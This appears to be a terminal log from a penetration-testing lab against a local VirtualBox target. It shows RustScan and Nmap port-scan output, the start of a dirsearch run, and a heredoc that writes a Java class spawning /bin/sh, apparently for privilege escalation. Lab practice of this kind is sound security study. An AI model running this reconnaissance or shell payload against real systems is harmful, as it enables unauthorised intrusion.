root@LAPTOP-O235O5EH [~] ➜ rustscan -a 192.168.100.22 [18:31:23] .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- With RustScan, I scan ports so fast, even my firewall gets whiplash 💨
[~] The config file is expected to be at "/root/.rustscan.toml" [~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'. Open 192.168.100.22:22 Open 192.168.100.22:80 [~] Starting Script(s) [~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-22 18:32 CST Initiating ARP Ping Scan at 18:32 Scanning 192.168.100.22 [1 port] Completed ARP Ping Scan at 18:32, 0.04s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 18:32 Completed Parallel DNS resolution of 1 host. at 18:32, 6.51s elapsed DNS resolution of 1 IPs took 6.52s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0] Initiating SYN Stealth Scan at 18:32 Scanning 192.168.100.22 [2 ports] Discovered open port 22/tcp on 192.168.100.22 Discovered open port 80/tcp on 192.168.100.22 Completed SYN Stealth Scan at 18:32, 0.02s elapsed (2 total ports) Nmap scan report for 192.168.100.22 Host is up, received arp-response (0.00050s latency). Scanned at 2026-01-22 18:32:38 CST for 0s
PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 64 80/tcp open http syn-ack ttl 64 MAC Address: 08:00:27:06:E0:1D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 6.66 seconds Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
root@LAPTOP-O235O5EH [~] ➜ dirsearch -u http://192.168.100.22 [18:32:38] /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict
cat >Shell.java <<EOF public class Shell { public static void main(String[] args) throws Exception { new ProcessBuilder("/bin/sh").inheritIO().start().waitFor(); } } EOF